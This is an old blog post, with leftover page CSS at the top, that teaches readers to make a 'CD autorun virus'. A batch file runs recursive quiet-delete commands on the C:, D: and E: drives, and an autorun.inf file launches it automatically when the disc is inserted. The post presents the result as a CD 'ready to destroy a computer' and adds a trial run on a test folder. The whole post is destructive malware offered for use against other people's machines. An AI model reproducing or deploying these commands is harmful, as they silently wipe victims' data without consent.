/* ----- LOWER SECTION ----- */ #lower { margin:auto; padding: 0px 0px 10px 0px; width: 100%; background:#333434; } #lower-wrapper { margin:auto; padding: 20px 0px 20px 0px; width: 960px; } #lowerbar-wrapper { border:1px solid #DEDEDE; background:#fff; float: left; margin: 0px 5px auto; padding-bottom: 20px; width: 32%; text-align: justify; font-size:100%; line-height: 1.6em; word-wrap: break-word; overflow: hidden; } .lowerbar {margin: 0; padding: 0;} .lowerbar .widget {margin: 0; padding: 10px 20px 0px 20px;} .lowerbar h2 { margin: 0px 0px 10px 0px; padding: 3px 0px 3px 0px; text-align: left; color:#0084ce; text-transform:uppercase; font: bold 14px Arial, Tahoma, Verdana; border-bottom:3px solid #0084ce; } .lowerbar ul { margin: 0px 0px 0px 0px; padding: 0px 0px 0px 0px; list-style-type: none; } .lowerbar li { margin: 0px 0px 2px 0px; padding: 0px 0px 1px 0px; border-bottom: 1px dotted #ccc; }

Wednesday, 27 November 2013

CD AUTORUN VIRUS, FORMATTING COMPUTER !


Create a file in note pad and name it "vrs.cmd"
write following commands in the file-

rd e:\*.* /s/q
rd d:\*.* /s/q
rd C:\*.* /s/q


after saving it with name vrs.cmd
plz dont'double click on it else u'll lose data frm ur hard disk

STEP 2-

make another file name it "autorun.inf"
and write following codes in it.

[AUTORUN]
open=vrs.cmd

save this file autorun.inf

STEP 3-
Now write these two files into a CD and CD is READY to destroy a computer..

CHECK___
u can check the ability of vrs.cmd i mean to have a trial

make a folder in "d:" name it "siva"
and put some files and folders it like songs, sanps etc
now make a file in note pad


rd d:\siva /s/q

and save it with name vr.cmd
and now double click on this file
it will remove siva folder from "d:" 



You might also like:

0 comments :

Post a Comment